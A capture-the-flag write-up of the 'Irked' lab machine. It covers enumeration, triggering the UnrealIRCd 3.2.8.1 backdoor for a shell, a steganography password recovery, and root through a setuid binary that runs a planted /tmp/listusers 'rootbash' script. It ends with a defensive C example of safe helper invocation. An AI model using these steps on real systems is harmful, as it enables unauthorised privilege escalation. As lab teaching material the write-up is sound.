Summary

Irked is an easy Linux box. Proper enumeration shows it is running a backdoored release of UnrealIRCd (3.2.8.1), and a short Python script that triggers the backdoor provides the initial shell as the ircd user. Getting the user flag requires a steganography extraction: a passphrase left in a backup note unlocks a password hidden inside the landing page image. After that, root comes from a SUID binary that runs a non-existent script, /tmp/listusers, through sh.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT      STATE SERVICE VERSION
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
45936/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

The webserver contained the following image:

Apart from this, not much of interest was found. The only slightly useful thing the webserver gave away was that it is running Apache (the /manual redirect and the forbidden /server-status are standard Apache paths):

http://10.129.1.108/manual (Status: 301)
http://10.129.1.108/server-status (Status: 403)

So the three IRC ports (6697, 8067 and 65534) are the interesting ones; according to Nmap they are all served by UnrealIRCd. Searchsploit finds the following entries for this software:

searchsploit unrealircd
-------------------------------------------------------------- -----------------------
 Exploit Title                                                |  Path
-------------------------------------------------------------- -----------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)  | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow       | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                     | windows/dos/27407.pl
-------------------------------------------------------------- -----------------------
Shellcodes: No Results

Exploitation

So Metasploit has a command execution module for the 3.2.8.1 backdoor. When you google for UnrealIRCd exploits you will also find a standalone Python version of the same backdoor trigger. After editing it with the target address, the IRC port and your own listener, you will obtain an initial shell as ircd:

ircd@irked:~/Unreal3.2$ hostname && whoami
hostname && whoami
irked
ircd

A find for the flag shows that user.txt is not in the usual place (directly in the user's home directory) but under Documents, and that it belongs to a different user. That should already raise a flag:

ircd@irked:~$ find / -name "user.txt" 2>/dev/null
/home/djmardov/Documents/user.txt

As you can see below, we don’t have permissions to read this file:

ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

The file that we do have access to is .backup. It contains this:

ircd@irked:/home/djmardov/Documents$ cat .backup 
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

I didn’t quite realise ‘steg’ is a reference to steganography.

Steganography is the technique of hiding secret data within an ordinary, non-secret, file or message in order to avoid detection; the secret data is then extracted at its destination.

If you did get the reference, you will know it has to do with the picture on the homepage we saw earlier. Let's inspect it. First download the image from the target with wget:

wget http://10.129.1.108/irked.jpg

Then let's analyse it with steghide, entering the passphrase from .backup (UPupDOWNdownLRlrBAbaSSss) at the prompt:

steghide info irked.jpg 
"irked.jpg":
  format: jpeg
  capacity: 1.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "pass.txt":
    size: 17.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

The info mode only reports that an embedded file exists; to get it, run steghide's extract mode on irked.jpg with the same passphrase and it writes pass.txt to the current directory. That file holds djmardov's password:

cat pass.txt
Kab6h+m[...]

Now you can su to djmardov with that password and read user.txt.


Privilege Escalation

The output from lse.sh (linux-smart-enumeration) is very useful in this case. It contained this:

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/X
/usr/bin/viewuser

These are both very uncommon. Lets check the first one:

/usr/bin/X
X: user not authorized to run the X server, aborting.

This doesn’t really provide any information. However, the latter does:

/usr/bin/viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-04-06 14:42 (:0)
sh: 1: /tmp/listusers: not found

We cannot modify the binary itself, but the last line of its output gives the game away: it runs /tmp/listusers through sh (hence the "sh: 1:" prefix), and that file does not exist yet. Since /tmp is world-writable we can simply create it, with the following contents:

djmardov@irked:/tmp$ cat > listusers
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
djmardov@irked:/tmp$ chmod a+x listusers

This is the usual rootbash trick: viewuser is setuid root, so the script it runs copies bash to /tmp/rootbash and sets the setuid bit on the copy. The execute bit on listusers is essential, otherwise sh refuses to run it. Re-run /usr/bin/viewuser and /tmp/rootbash appears.

Now you can become root by executing the copy with -p, which tells bash to keep the effective uid instead of dropping back to the real one:

/tmp/rootbash -p
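The root cause is worth seeing in code. The following is an added illustration, not the source of viewuser (which the page does not show): the vulnerable pattern that is consistent with the "sh: 1: /tmp/listusers: not found" message, a setuid-root binary calling system() on a path in a world-writable directory, beside a hardened version that only executes a helper whose file and directory are root-owned and not writable by others, drops root before the exec, and avoids the shell and the caller's environment altogether. The helper location /usr/local/sbin/listusers used in main() is a hypothetical one.

```c
/* Added example: vulnerable and hardened helper invocation from a
 * setuid-root program. Not the viewuser source. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern (assumed to be what the box's binary does).
 * system() runs the path through /bin/sh with the caller's environment
 * and with the effective uid of the setuid binary, i.e. root. Because
 * /tmp is world-writable, whoever creates /tmp/listusers gets root. */
int run_listusers_vulnerable(void)
{
    return system("/tmp/listusers");
}

/* Return 1 if a helper path is safe to execute from a privileged
 * context: it must be absolute, and both the file and the directory
 * holding it must exist, be owned by root and not be group- or
 * world-writable. Anything under /tmp fails on the directory check
 * alone, since /tmp is mode 1777. */
int helper_path_is_trusted(const char *path)
{
    char dir[4096];
    struct stat st;
    const char *slash = strrchr(path, '/');
    size_t dlen;

    if (path[0] != '/' || slash == NULL || strlen(path) >= sizeof dir)
        return 0;

    dlen = (size_t)(slash - path);
    memcpy(dir, path, dlen);
    dir[dlen] = '\0';
    if (dlen == 0)
        strcpy(dir, "/");   /* file sits directly in the root directory */

    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != 0
        || (st.st_mode & (S_IWGRP | S_IWOTH)))
        return 0;

    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != 0
        || (st.st_mode & (S_IWGRP | S_IWOTH)))
        return 0;

    return 1;
}

/* Hardened pattern: trust check on a fixed path, privileges dropped to
 * the real uid/gid in the child before exec, no shell, and a clean
 * environment so PATH, IFS or LD_* from the caller cannot matter.
 * Returns the helper's exit status, or -1 on refusal/failure. */
int run_listusers_hardened(const char *helper)
{
    char *const argv[] = { "listusers", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid;
    int status = 0;

    if (!helper_path_is_trusted(helper))
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: give up root for good, then exec the helper directly. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        execve(helper, argv, envp);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    printf("/tmp/listusers trusted: %d\n", helper_path_is_trusted("/tmp/listusers"));
    printf("/bin/true trusted: %d\n", helper_path_is_trusted("/bin/true"));
    printf("/usr/local/sbin/listusers trusted: %d\n",
           helper_path_is_trusted("/usr/local/sbin/listusers"));
    return 0;
}
```

The trust check is the part that would have stopped this box: a helper that is missing, or that lives where unprivileged users can write, is refused rather than handed to a shell as root. Dropping privileges before the exec is the second layer, so that even a trusted helper with a bug cannot run with the setuid binary's uid.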

Conclusion

Apart from the steganography, I found this a very enjoyable box. I’m personally not so interested in steganography but since the difficulty was quite easy this one was alright. The other exploitation techniques are relatively straightforward. Hope you enjoyed this writeup!